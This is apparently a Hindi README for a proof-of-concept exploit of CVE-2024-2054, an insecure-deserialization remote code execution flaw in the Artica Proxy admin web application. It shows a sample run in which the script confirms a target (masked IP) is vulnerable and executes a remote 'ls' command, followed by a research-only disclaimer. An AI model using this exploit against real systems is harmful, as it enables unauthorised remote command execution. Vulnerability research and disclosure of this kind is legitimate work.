
CVE-2024-2054 के लिए अवधारणा-प्रमाण शोषण, जो Artica-Proxy प्रशासनिक वेब एप्लिकेशन में असुरक्षित डिसीरियलाइज़ेशन RCE प्रदर्शित करता है। इसमें कमांड निष्पादन और भेद्यता सत्यापन शामिल हैं।
ARTICA PROXY प्रशासनिक वेब एप्लिकेशन CVE-2024-2054 के लिए एक शोषण प्रूफ ऑफ कॉन्सेप्ट
अधिक विवरण यहाँ: https://blog.sonicwall.com/en-us/2024/03/unpatched-php-deserialization-vulnerability-in-artica-proxy/
$ python3 CVE-2024-2054.py
Enter url: https://8X.XX.XX.X4:9000
Vulnerable
enter command: ls
assets
index.html
wiz.upload.php
wiz.wizard.php
wiz.wizard.progress.php
यह POC पूरी तरह से अकादमिक शोध और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग सिस्टम पर हमला करने के लिए नहीं किया जाना है, सिवाय उन मामलों के जहां स्पष्ट रूप से अधिकृत किया गया हो। परियोजना निर्माता/अनुरक्षक सॉफ्टवेयर/POC के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।